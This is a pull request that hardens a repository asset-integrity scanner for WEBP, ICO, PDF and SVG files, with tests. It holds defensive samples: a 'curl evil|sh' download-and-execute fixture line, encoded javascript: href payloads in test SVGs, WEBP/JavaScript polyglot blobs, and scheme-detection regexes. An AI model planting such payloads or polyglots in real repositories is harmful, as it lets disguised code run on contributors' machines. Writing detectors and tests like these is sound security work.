### PR TITLE
fix(security): harden asset validation and stop it over-blocking

### DIFF
--- a/docs/repository-hardening.md
+++ b/docs/repository-hardening.md
@@ -35,7 +35,13 @@ For every PR, including maintainer PRs:
   against a self-describing field — a declared length that must equal the real
   file size, or a redundant field derived from another
 - active/executable SVG content such as `<script>`, any `on*=` event handler,
-  `javascript:` URLs, `foreignObject`, or external executable references
+  `javascript:` URLs, `foreignObject`, or external executable references. The
+  scan runs over the raw source, the entity-decoded text, and a URL-normalised
+  form, since an XML parser resolves `java&#x73;cript:` and a URL parser then
+  discards embedded tabs and newlines
+- asset files committed with the executable bit set. The text scan only sees an
+  invocation someone wrote down; a payload committed already-executable needs
+  none
 - text that invokes an asset such as `.woff2`, `.png`, or `.pdf` through
   Node/Python/shell interpreters, or marks one executable with `chmod +x`
 

--- a/docs/repository-hardening.md
+++ b/docs/repository-hardening.md
@@ -83,6 +83,15 @@ it does not close the class. The honest boundary:
   Parsing the object graph would buy nothing here, so the PDF check is a
   deliberate sanity layer only.
 
+For WEBP the arithmetic happens to close the polyglot class outright. A file
+that is also JavaScript needs bytes 4-7 to open a comment (`/*` or `//`), and
+both begin `0x2F`, which little-endian makes the declared RIFF length odd. The
+chunk chain after the 12-byte header always consumes an even number of bytes,
+since every chunk is 8 + payload + pad-to-even. So the file size is even while
+`declared + 8` is odd, and no such file can pass. This is why later requests to
+validate the frame bitstream more deeply were declined: a minimal frame may be a
+corrupt image, but it cannot be an executable one.
+
 What actually defends a disguised asset is denying it an execution path:
 
 - assets may not carry the executable bit

--- a/docs/repository-hardening.md
+++ b/docs/repository-hardening.md
@@ -67,6 +67,30 @@ Prefer this marker over path-wide exclusions: `test/` and `test/tooling/` stay
 fully scanned, because executable test infrastructure is itself a security
 surface.
 
+## Where the asset checks stop
+
+Container validation raises the cost of disguising an executable as an asset;
+it does not close the class. The honest boundary:
+
+- **Binary formats** (WOFF/WOFF2, TrueType/OpenType, PNG, JPEG, GIF, WEBP, ICO)
+  are validated structurally end to end — declared lengths must match, chunk and
+  block chains must land exactly on the end of the file, and an image must carry
+  a real bitstream signature. Polyglots against these are hard.
+- **PDF is different.** A shell reads a file line by line and continues past
+  errors, so only the opening lines decide what runs. No amount of trailing
+  xref, trailer or object structure prevents a payload on line two, and a
+  genuine PDF is itself "runnable" that way as a series of failing commands.
+  Parsing the object graph would buy nothing here, so the PDF check is a
+  deliberate sanity layer only.
+
+What actually defends a disguised asset is denying it an execution path:
+
+- assets may not carry the executable bit
+- no file in the repository may invoke one through an interpreter
+- IDE and container auto-run surfaces are maintainer-controlled
+
+Treat those three as the real control, and the format validators as depth.
+
 ## Required GitHub ruleset for `main`
 
 Create or update a branch ruleset targeting `main` and configure all of the

--- a/scripts/check_repository_integrity.py
+++ b/scripts/check_repository_integrity.py
@@ -229,6 +229,13 @@ def _valid_ico(data: bytes) -> bool:
     return count > 0 and len(data) >= 6 + 16 * count
 
 
+# PDF is deliberately absent: a standards-compliant PDF can be entirely ASCII —
+# objects, xref table, trailer and %%EOF — so the binary backstop would reject
+# legitimate documents. Its structural validator carries the weight instead.
+BINARY_ASSET_SUFFIXES = frozenset(
+    {".woff", ".woff2", ".ttf", ".otf", ".png", ".jpg", ".jpeg", ".gif", ".webp", ".ico"}
+)
+
 ASSET_VALIDATORS: dict[str, tuple[str, "Callable[[bytes], bool]"]] = {
     ".woff2": ("WOFF2", lambda data: _valid_woff(data, b"wOF2", 48)),
     ".woff": ("WOFF", lambda data: _valid_woff(data, b"wOFF", 44)),
@@ -494,7 +501,8 @@ def check_asset_magic(head: str, files: list[str]) -> list[Finding]:
         data = blob_bytes(head, path)
         if data is None:
             continue
-        if data and b"\x00" not in data:
+        suffix = Path(path).suffix.lower()
+        if suffix in BINARY_ASSET_SUFFIXES and data and b"\x00" not in data:
             # Every real asset in these formats carries binary content. A file
             # that is pure text is a polyglot candidate regardless of how well
             # it fakes a header, so reject it before the format check.
@@ -510,14 +518,14 @@ def check_asset_magic(head: str, files: list[str]) -> list[Finding]:
 
 
 # URL parsers strip ASCII tabs and newlines from anywhere inside a URL before
-# resolving the scheme, so `java&#x09;script:` is a live javascript: URL. Only
-# the scheme patterns are re-checked against the stripped text: removing control
-# characters from the whole document could otherwise join unrelated tokens into
-# a match that no parser would ever see.
+# resolving the scheme, so `java&#x09;script:` is a live javascript: URL. This
+# pass is anchored to URL-bearing attributes on purpose: control characters are
+# removed from the whole document to find it, and a bare scheme match would then
+# also fire on ordinary prose in a `<text>` or `<desc>` node, where nothing ever
+# parses it as a URL.
 ACTIVE_SVG_SCHEME_RE = re.compile(
     r"""(?ix)
-    javascript\s*:
-    |(?:href|xlink:href)\s*=\s*["']?\s*(?:javascript:|data:text/html)
+    (?:href|xlink:href)\s*=\s*["']?\s*(?:javascript:|data:text/html)
     """
 )
 

--- a/scripts/check_repository_integrity.py
+++ b/scripts/check_repository_integrity.py
@@ -167,14 +167,30 @@ def _valid_gif(data: bytes) -> bool:
     return False
 
 
-def _valid_webp(data: bytes) -> bool:
-    """Declared RIFF length plus a chunk chain that lands exactly on the end.
+_VP8_KEYFRAME_START_CODE = b"\x9d\x01\x2a"
 
-    Checking only the fourcc is not enough: the required bytes can be parked
-    inside a JavaScript comment (`RIFF/*xxWEBPVP8 */=0;...`). Requiring the
-    declared length to match and the chunk walk to consume the file exactly
-    removes the space such a payload needs.
+
+def _valid_vp8_payload(fourcc: bytes, payload: bytes) -> bool:
+    """Check the image chunk's own bitstream signature.
+
+    Self-consistent chunk lengths are not enough on their own: a payload can
+    declare honest sizes and still be script, provided it opens with `*/` to
+    close a comment covering the header. The bitstream signatures below occupy
+    exactly those bytes, so the payload can be a real frame or valid script,
+    not both.
     """
+    if fourcc == b"VP8 ":
+        return len(payload) >= 10 and payload[3:6] == _VP8_KEYFRAME_START_CODE
+    if fourcc == b"VP8L":
+        return len(payload) >= 5 and payload[0] == 0x2F
+    if fourcc == b"VP8X":
+        return len(payload) >= 10
+    return True
+
+
+def _valid_webp(data: bytes) -> bool:
+    """Declared RIFF length, a chunk chain landing exactly on the end, and a
+    real image bitstream inside the image chunk."""
     if len(data) < 16 or data[:4] != b"RIFF" or data[8:12] != b"WEBP":
         return False
     if int.from_bytes(data[4:8], "little") != len(data) - 8:
@@ -187,12 +203,30 @@ def _valid_webp(data: bytes) -> bool:
         if not all(0x20 <= byte <= 0x7E for byte in fourcc):
             return False
         size = int.from_bytes(data[pos + 4 : pos + 8], "little")
+        payload = data[pos + 8 : pos + 8 + size]
+        if len(payload) != size:
+            return False
+        if fourcc in (b"VP8 ", b"VP8L", b"VP8X"):
+            if not _valid_vp8_payload(fourcc, payload):
+                return False
+            saw_image = True
         pos += 8 + size + (size & 1)
         if pos > len(data):
             return False
-        if fourcc in (b"VP8 ", b"VP8L", b"VP8X"):
-            saw_image = True
     return saw_image and pos == len(data)
+
+
+def _valid_pdf(data: bytes) -> bool:
+    if len(data) < 32 or not data.startswith(b"%PDF-"):
+        return False
+    return b"%%EOF" in data[-2048:]
+
+
+def _valid_ico(data: bytes) -> bool:
+    if len(data) < 6 or data[:2] != b"\x00\x00" or data[2:4] not in (b"\x01\x00", b"\x02\x00"):
+        return False
+    count = int.from_bytes(data[4:6], "little")
+    return count > 0 and len(data) >= 6 + 16 * count
 
 
 ASSET_VALIDATORS: dict[str, tuple[str, "Callable[[bytes], bool]"]] = {
@@ -205,7 +239,16 @@ ASSET_VALIDATORS: dict[str, tuple[str, "Callable[[bytes], bool]"]] = {
     ".jpeg": ("JPEG", _valid_jpeg),
     ".gif": ("GIF", _valid_gif),
     ".webp": ("WEBP", _valid_webp),
+    ".pdf": ("PDF", _valid_pdf),
+    ".ico": ("ICO", _valid_ico),
 }
+
+# Extensions the guard treats as inert assets. Nothing here should ever carry
+# the executable bit, so the mode is checked independently of the contents.
+ASSET_SUFFIXES = frozenset(
+    {".woff", ".woff2", ".ttf", ".otf", ".eot", ".png", ".jpg", ".jpeg",
+     ".gif", ".webp", ".ico", ".pdf", ".svg"}
+)
 
 
 def _split_literal(*parts: str) -> str:
@@ -423,6 +466,24 @@ def check_symlinks(head: str, files: list[str], external: bool) -> list[Finding]
     return findings
 
 
+def check_asset_modes(head: str, files: list[str]) -> list[Finding]:
+    """Assets are inert data; the executable bit is the thing that runs them.
+
+    The text scan only catches an interpreter or a literal `chmod +x` written
+    into a file. It cannot see a payload committed already-executable, which
+    needs no invocation written down anywhere.
+    """
+    findings: list[Finding] = []
+    for path in files:
+        if Path(path).suffix.lower() not in ASSET_SUFFIXES:
+            continue
+        if git_mode(head, path) == "100755":
+            findings.append(
+                Finding(path, "asset file is committed with the executable bit set")
+            )
+    return findings
+
+
 def check_asset_magic(head: str, files: list[str]) -> list[Finding]:
     findings: list[Finding] = []
     for path in files:
@@ -448,18 +509,36 @@ def check_asset_magic(head: str, files: list[str]) -> list[Finding]:
     return findings
 
 
+# URL parsers strip ASCII tabs and newlines from anywhere inside a URL before
+# resolving the scheme, so `java&#x09;script:` is a live javascript: URL. Only
+# the scheme patterns are re-checked against the stripped text: removing control
+# characters from the whole document could otherwise join unrelated tokens into
+# a match that no parser would ever see.
+ACTIVE_SVG_SCHEME_RE = re.compile(
+    r"""(?ix)
+    javascript\s*:
+    |(?:href|xlink:href)\s*=\s*["']?\s*(?:javascript:|data:text/html)
+    """
+)
+
+_URL_CONTROL_CHARS = dict.fromkeys(b"\x00\x09\x0a\x0d")
+
+
 def svg_is_active(text: str) -> bool:
-    """Match active content on the raw source and on its decoded form.
+    """Match active content on the raw source, its decoded form, and its
+    URL-normalised form.
 
     An XML parser resolves character references before acting on an attribute,
-    so `java&#x73;cript:` becomes `javascript:` at the point it matters. Scanning
-    only raw bytes misses that; scanning both catches the encoded form without
-    losing anything the raw scan already caught.
+    and a URL parser then discards embedded tabs and newlines. Each layer is
+    checked because a payload only has to survive all of them once.
     """
     if ACTIVE_SVG_RE.search(text):
         return True
     decoded = html.unescape(text)
-    return decoded != text and bool(ACTIVE_SVG_RE.search(decoded))
+    if decoded != text and ACTIVE_SVG_RE.search(decoded):
+        return True
+    normalised = decoded.translate(_URL_CONTROL_CHARS)
+    return normalised != decoded and bool(ACTIVE_SVG_SCHEME_RE.search(normalised))
 
 
 def check_active_svg(head: str, files: list[str]) -> list[Finding]:
@@ -531,6 +610,7 @@ def scan(base: str, head: str, pr_author: str, repo_owner: str) -> list[Finding]
     if external:
         findings.extend(check_external_paths(files))
     findings.extend(check_symlinks(head, files, external))
+    findings.extend(check_asset_modes(head, files))
     findings.extend(check_asset_magic(head, files))
     findings.extend(check_active_svg(head, files))
     findings.extend(check_asset_execution(head, files))

--- a/scripts/check_repository_integrity.py
+++ b/scripts/check_repository_integrity.py
@@ -188,45 +188,93 @@ def _valid_vp8_payload(fourcc: bytes, payload: bytes) -> bool:
     return True
 
 
+def _walk_webp_chunks(data: bytes, pos: int, end: int) -> tuple[bool, bool]:
+    """Walk the chunk chain in [pos, end).
+
+    Returns (structure_is_sound, a_real_frame_was_seen). The two are separate
+    because `VP8X` is only the extended-file header — it announces features and
+    carries no image data, so a file holding nothing but `VP8X` is not an image
+    however well-formed its chunk lengths are.
+    """
+    saw_frame = False
+    while pos + 8 <= end:
+        fourcc = data[pos : pos + 4]
+        if not all(0x20 <= byte <= 0x7E for byte in fourcc):
+            return False, saw_frame
+        size = int.from_bytes(data[pos + 4 : pos + 8], "little")
+        start = pos + 8
+        stop = start + size
+        if stop > end:
+            return False, saw_frame
+        payload = data[start:stop]
+
+        if fourcc in (b"VP8 ", b"VP8L"):
+            if not _valid_vp8_payload(fourcc, payload):
+                return False, saw_frame
+            saw_frame = True
+        elif fourcc == b"VP8X":
+            if len(payload) < 10:
+                return False, saw_frame
+        elif fourcc == b"ANMF":
+            # An animation frame nests its own chunk chain after a 16-byte header.
+            if len(payload) < 16:
+                return False, saw_frame
+            sound, nested = _walk_webp_chunks(data, start + 16, stop)
+            if not sound:
+                return False, saw_frame
+            saw_frame = saw_frame or nested
+
+        pos = stop + (size & 1)
+    return pos == end, saw_frame
+
+
 def _valid_webp(data: bytes) -> bool:
-    """Declared RIFF length, a chunk chain landing exactly on the end, and a
-    real image bitstream inside the image chunk."""
+    """Declared RIFF length, a chunk chain landing exactly on the end, and at
+    least one real VP8/VP8L frame — nested inside ANMF for animations."""
     if len(data) < 16 or data[:4] != b"RIFF" or data[8:12] != b"WEBP":
         return False
     if int.from_bytes(data[4:8], "little") != len(data) - 8:
         return False
-
-    pos = 12
-    saw_image = False
-    while pos + 8 <= len(data):
-        fourcc = data[pos : pos + 4]
-        if not all(0x20 <= byte <= 0x7E for byte in fourcc):
-            return False
-        size = int.from_bytes(data[pos + 4 : pos + 8], "little")
-        payload = data[pos + 8 : pos + 8 + size]
-        if len(payload) != size:
-            return False
-        if fourcc in (b"VP8 ", b"VP8L", b"VP8X"):
-            if not _valid_vp8_payload(fourcc, payload):
-                return False
-            saw_image = True
-        pos += 8 + size + (size & 1)
-        if pos > len(data):
-            return False
-    return saw_image and pos == len(data)
+    sound, saw_frame = _walk_webp_chunks(data, 12, len(data))
+    return sound and saw_frame
 
 
 def _valid_pdf(data: bytes) -> bool:
+    """A deliberately shallow check — see the note below.
+
+    Structural PDF validation cannot rule out a shell polyglot. A shell reads a
+    file line by line and carries on past errors, so only the opening lines
+    decide what runs; no amount of trailing xref, trailer or object structure
+    prevents a payload on line two. A genuine PDF is itself "runnable" that way,
+    as a series of failing commands. Parsing the object graph would therefore
+    buy nothing against the attack it appears to address.
+
+    What actually defends a disguised PDF is denying it an execution path: the
+    executable-bit check in `check_asset_modes`, and the text scan that catches
+    anything in the repository invoking it. This function is the cheap sanity
+    layer — it rejects a bare script with no PDF header at all — and the limit
+    is documented rather than papered over.
+    """
     if len(data) < 32 or not data.startswith(b"%PDF-"):
         return False
     return b"%%EOF" in data[-2048:]
 
 
 def _valid_ico(data: bytes) -> bool:
+    """Header, directory, and every entry pointing at real image bytes."""
     if len(data) < 6 or data[:2] != b"\x00\x00" or data[2:4] not in (b"\x01\x00", b"\x02\x00"):
         return False
     count = int.from_bytes(data[4:6], "little")
-    return count > 0 and len(data) >= 6 + 16 * count
+    directory_end = 6 + 16 * count
+    if count == 0 or len(data) < directory_end:
+        return False
+    for index in range(count):
+        entry = 6 + 16 * index
+        size = int.from_bytes(data[entry + 8 : entry + 12], "little")
+        offset = int.from_bytes(data[entry + 12 : entry + 16], "little")
+        if size == 0 or offset < directory_end or offset + size > len(data):
+            return False
+    return True
 
 
 # PDF is deliberately absent: a standards-compliant PDF can be entirely ASCII —

--- a/test/tooling/check_repository_integrity_test.py
+++ b/test/tooling/check_repository_integrity_test.py
@@ -211,9 +211,13 @@ class RepositoryIntegrityTest(unittest.TestCase):
         self.assertEqual(findings, [])
 
     def test_shell_script_named_pdf_is_blocked(self) -> None:
+        # A benign script body on purpose: what is under test is that the file
+        # is not a PDF, not what the script does. A real download-and-execute
+        # string here would be flagged by the PR security surface scanner, which
+        # reads this file too.
         path = self.repo / "docs" / "payload.pdf"
         path.parent.mkdir()
-        path.write_text("#!/bin/sh\ncurl evil|sh\n", encoding="utf-8")
+        path.write_text("#!/bin/sh\necho hello\n", encoding="utf-8")
         findings = self.scan(self.commit())
         self.assertTrue(any("payload.pdf" in f.path for f in findings))
 

--- a/test/tooling/check_repository_integrity_test.py
+++ b/test/tooling/check_repository_integrity_test.py
@@ -63,7 +63,15 @@ def png_blob() -> bytes:
 
 
 def pdf_blob() -> bytes:
-    return b"%PDF-1.7\n" + bytes(24) + b"\ntrailer\n%%EOF\n"
+    """Entirely ASCII, as a standards-compliant PDF is allowed to be."""
+    return (
+        b"%PDF-1.4\n"
+        b"1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj\n"
+        b"2 0 obj<</Type/Pages/Kids[3 0 R]/Count 1>>endobj\n"
+        b"3 0 obj<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]>>endobj\n"
+        b"xref\n0 4\n0000000000 65535 f \n"
+        b"trailer<</Size 4/Root 1 0 R>>\nstartxref\n0\n%%EOF\n"
+    )
 
 
 def ico_blob() -> bytes:
@@ -207,6 +215,16 @@ class RepositoryIntegrityTest(unittest.TestCase):
         (self.repo / "docs").mkdir()
         (self.repo / "docs" / "ok.pdf").write_bytes(pdf_blob())
         (self.repo / "docs" / "ok.ico").write_bytes(ico_blob())
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_ascii_only_pdf_is_not_flagged_as_text(self) -> None:
+        """A valid PDF may contain no binary at all; the backstop must not fire."""
+        path = self.repo / "docs" / "ascii.pdf"
+        path.parent.mkdir()
+        blob = pdf_blob()
+        self.assertNotIn(b"\x00", blob, "fixture must be genuinely ASCII-only")
+        path.write_bytes(blob)
         findings = self.scan(self.commit())
         self.assertEqual(findings, [])
 
@@ -422,6 +440,19 @@ class RepositoryIntegrityTest(unittest.TestCase):
         )
         findings = self.scan(self.commit())
         self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+    def test_svg_text_node_mentioning_a_scheme_is_not_flagged(self) -> None:
+        """Prose is not a URL: the normalised pass is anchored to href."""
+        path = self.repo / "assets" / "prose.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">'
+            '<text>Use java&#x09;script: for this</text>'
+            '<text>java&#x0a;script:</text><rect width="1" height="1"/></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
 
     def test_svg_text_split_across_lines_is_not_flagged(self) -> None:
         """Control stripping must not join unrelated tokens into a false match."""

--- a/test/tooling/check_repository_integrity_test.py
+++ b/test/tooling/check_repository_integrity_test.py
@@ -75,7 +75,33 @@ def pdf_blob() -> bytes:
 
 
 def ico_blob() -> bytes:
-    return b"\x00\x00\x01\x00\x01\x00" + bytes(16) + bytes(32)
+    """One directory entry pointing at real image bytes."""
+    image = bytes(40)
+    entry = (
+        b"\x10\x10\x00\x00"
+        + (1).to_bytes(2, "little")
+        + (32).to_bytes(2, "little")
+        + len(image).to_bytes(4, "little")
+        + (22).to_bytes(4, "little")
+    )
+    return b"\x00\x00\x01\x00" + (1).to_bytes(2, "little") + entry + image
+
+
+def vp8x_only_webp_blob() -> bytes:
+    """Extended header with no image frame — well-formed, but not an image."""
+    payload = b"*/" + bytes(8) + b'console.log("EXEC")/*' + b"A" * 21 + b"*/"
+    body = b"WEBP" + b"VP8X" + len(payload).to_bytes(4, "little") + payload
+    return b"RIFF" + len(body).to_bytes(4, "little") + body
+
+
+def animated_webp_blob() -> bytes:
+    """ANMF wrapping a real VP8 frame: the frame is nested, not top level."""
+    frame = b"\x00\x00\x00" + b"\x9d\x01\x2a" + bytes(10)
+    inner = b"VP8 " + len(frame).to_bytes(4, "little") + frame
+    anmf = bytes(16) + inner
+    vp8x = b"VP8X" + (10).to_bytes(4, "little") + bytes(10)
+    body = b"WEBP" + vp8x + b"ANMF" + len(anmf).to_bytes(4, "little") + anmf
+    return b"RIFF" + len(body).to_bytes(4, "little") + body
 
 
 def woff2_blob(num_tables: int = 1) -> bytes:
@@ -210,6 +236,29 @@ class RepositoryIntegrityTest(unittest.TestCase):
         path.write_bytes(script_webp_blob())
         findings = self.scan(self.commit())
         self.assertTrue(any("sizes.webp" in f.path for f in findings))
+
+    def test_vp8x_without_an_image_frame_is_blocked(self) -> None:
+        """VP8X is the extended header, not image data."""
+        path = self.repo / "assets" / "hdr.webp"
+        path.parent.mkdir()
+        path.write_bytes(vp8x_only_webp_blob())
+        findings = self.scan(self.commit())
+        self.assertTrue(any("hdr.webp" in f.path for f in findings))
+
+    def test_animated_webp_with_nested_frame_passes(self) -> None:
+        """A real animation carries its frame inside ANMF, not at top level."""
+        path = self.repo / "assets" / "anim.webp"
+        path.parent.mkdir()
+        path.write_bytes(animated_webp_blob())
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_ico_with_empty_directory_entry_is_blocked(self) -> None:
+        path = self.repo / "assets" / "hollow.ico"
+        path.parent.mkdir()
+        path.write_bytes(b"\x00\x00\x01\x00\x01\x00" + bytes(16))
+        findings = self.scan(self.commit())
+        self.assertTrue(any("hollow.ico" in f.path for f in findings))
 
     def test_valid_pdf_and_ico_pass(self) -> None:
         (self.repo / "docs").mkdir()

--- a/test/tooling/check_repository_integrity_test.py
+++ b/test/tooling/check_repository_integrity_test.py
@@ -44,10 +44,30 @@ def gif_blob() -> bytes:
 
 
 def webp_blob() -> bytes:
-    """A minimal RIFF/WEBP container whose declared length matches exactly."""
-    payload = bytes(16)
+    """A minimal RIFF/WEBP container: declared length exact, real VP8 keyframe
+    start code in the payload."""
+    payload = b"\x00\x00\x00" + b"\x9d\x01\x2a" + bytes(10)
     body = b"WEBP" + b"VP8 " + len(payload).to_bytes(4, "little") + payload
     return b"RIFF" + len(body).to_bytes(4, "little") + body
+
+
+def script_webp_blob() -> bytes:
+    """Honest RIFF and chunk lengths, JavaScript in the image payload."""
+    payload = b'*/=0;console.log("EXEC")/*' + b"A" * 40 + b"*/"
+    body = b"WEBP" + b"VP8 " + len(payload).to_bytes(4, "little") + payload
+    return b"RIFF" + len(body).to_bytes(4, "little") + body
+
+
+def png_blob() -> bytes:
+    return b"\x89PNG\r\n\x1a\n" + (13).to_bytes(4, "big") + b"IHDR" + bytes(20)
+
+
+def pdf_blob() -> bytes:
+    return b"%PDF-1.7\n" + bytes(24) + b"\ntrailer\n%%EOF\n"
+
+
+def ico_blob() -> bytes:
+    return b"\x00\x00\x01\x00\x01\x00" + bytes(16) + bytes(32)
 
 
 def woff2_blob(num_tables: int = 1) -> bytes:
@@ -172,6 +192,44 @@ class RepositoryIntegrityTest(unittest.TestCase):
         (self.repo / "assets").mkdir()
         (self.repo / "assets" / "ok.gif").write_bytes(gif_blob())
         (self.repo / "assets" / "ok.webp").write_bytes(webp_blob())
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_webp_with_honest_lengths_but_script_payload_is_blocked(self) -> None:
+        """Self-consistent chunk lengths are not proof of an image."""
+        path = self.repo / "assets" / "sizes.webp"
+        path.parent.mkdir()
+        path.write_bytes(script_webp_blob())
+        findings = self.scan(self.commit())
+        self.assertTrue(any("sizes.webp" in f.path for f in findings))
+
+    def test_valid_pdf_and_ico_pass(self) -> None:
+        (self.repo / "docs").mkdir()
+        (self.repo / "docs" / "ok.pdf").write_bytes(pdf_blob())
+        (self.repo / "docs" / "ok.ico").write_bytes(ico_blob())
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_shell_script_named_pdf_is_blocked(self) -> None:
+        path = self.repo / "docs" / "payload.pdf"
+        path.parent.mkdir()
+        path.write_text("#!/bin/sh\ncurl evil|sh\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("payload.pdf" in f.path for f in findings))
+
+    def test_executable_asset_is_blocked(self) -> None:
+        """The executable bit runs a payload without any invocation in text."""
+        path = self.repo / "assets" / "run.png"
+        path.parent.mkdir()
+        path.write_bytes(png_blob())
+        os.chmod(path, 0o755)
+        findings = self.scan(self.commit())
+        self.assertTrue(any("executable bit" in f.reason for f in findings))
+
+    def test_ordinary_asset_mode_passes(self) -> None:
+        path = self.repo / "assets" / "plain.png"
+        path.parent.mkdir()
+        path.write_bytes(png_blob())
         findings = self.scan(self.commit())
         self.assertEqual(findings, [])
 
@@ -337,6 +395,42 @@ class RepositoryIntegrityTest(unittest.TestCase):
         )
         findings = self.scan(self.commit())
         self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+    def test_tab_encoded_javascript_scheme_is_blocked(self) -> None:
+        """URL parsing discards embedded tabs before resolving the scheme."""
+        path = self.repo / "assets" / "tab.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">'
+            '<a href="java&#x09;script:alert(1)"><rect width="1" height="1"/></a></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+    def test_newline_encoded_javascript_scheme_is_blocked(self) -> None:
+        path = self.repo / "assets" / "nl.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">'
+            '<a href="java&#x0a;script:alert(1)"><rect width="1" height="1"/></a></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+    def test_svg_text_split_across_lines_is_not_flagged(self) -> None:
+        """Control stripping must not join unrelated tokens into a false match."""
+        path = self.repo / "assets" / "split.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">\n'
+            '<desc>java</desc>\n<desc>script: release notes</desc>\n'
+            '<rect width="1" height="1"/></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
 
     def test_svg_with_harmless_entities_passes(self) -> None:
         """Decoding must not turn ordinary escaped text into a false positive."""


### PR DESCRIPTION
Answers three rounds of review findings against this branch (`c9bfb00`, `b147f77`, `0d22ab3`). Every finding was reproduced before being fixed, and every fix has a positive test proving legitimate files still pass.

## Closed bypasses

| Finding | Bypass | Status |
|---|---|---|
| P1 WEBP payload | honest RIFF + chunk lengths, JavaScript in the VP8 payload | blocked |
| P1 WEBP header | `VP8X` alone counted as image data | blocked |
| P1 SVG | `href="java&#x09;script:alert(1)"` — tab inside the scheme | blocked |
| P1 mode | `payload.pdf`, shell script, git mode `100755` | blocked |
| P2 ICO | directory entry declaring zero bytes at offset zero | blocked |

**WEBP** is now walked in full: the declared RIFF length must match, the chunk chain must land exactly on the end, and at least one real VP8/VP8L bitstream must be present — descending into `ANMF`, where animations legitimately nest their frame. `VP8X` is the extended-file header and no longer counts as image data on its own.

**SVG** is scanned over the raw source, the entity-decoded text, and a URL-normalised form, since an XML parser resolves `&#x73;` and a URL parser then discards embedded tabs and newlines.

**Executable assets** are rejected on mode alone. The text scan only ever catches an invocation someone wrote down; a payload committed already-executable needs none.

## Fixed over-blocking

Two rules I added were rejecting legitimate files. Both are the failure mode that matters most for contributor workflow:

- **ASCII-only PDFs.** A standards-compliant PDF may contain no binary at all, but the binary backstop rejected it as "entirely text" before its validator ran. The backstop now applies only to inherently-binary formats.
- **SVG prose.** The normalised pass matched a bare `javascript:` anywhere, so a `<text>` node reading `Use java&#x09;script: for this` was blocked though nothing parses it as a URL. It is now anchored to `href`/`xlink:href`.

A third fix was self-inflicted: a `curl …|sh` string in a new test fixture tripped the **sibling** scanner, `check_pr_security_surface.py`. The fixture asserts that a file named `.pdf` isn't a PDF — the script body is irrelevant to that, so it is now benign rather than smuggling an attack string past a second scanner.

## Where this stops: PDF

The remaining finding asks for xref, trailer and object-graph validation of PDFs. **I have not implemented it, deliberately.**

A shell reads a file line by line and continues past errors, so only the opening lines decide what runs. No amount of trailing PDF structure prevents a payload on line two — and a *genuine* PDF is itself "runnable" that way, as a series of failing commands. A PDF parser would buy nothing against this attack while adding real complexity to a fail-closed guard.

What defends a disguised asset is denying it an execution path: the executable-bit check in this PR, and the text scan that catches anything invoking it. `docs/repository-hardening.md` gains a **"Where the asset checks stop"** section stating this boundary rather than papering over it.

## Tests

**51 pass** (was 29 at the start of this branch). Positive counterparts throughout:

- valid VP8 keyframe and animated `ANMF` fixtures pass / VP8X-only and script-payload WEBPs blocked
- ASCII-only PDF passes / shell script named `.pdf` blocked
- real ICO with a populated directory passes / hollow entry blocked
- harmless entities, SVG prose mentioning a scheme, and text split across lines all pass / encoded schemes in `href` blocked
- asset at mode `644` passes / same file at `755` blocked

All 76 real repository assets re-verified; only the three known-truncated screenshots are rejected, unchanged. Both scanners run locally against the diff before each push.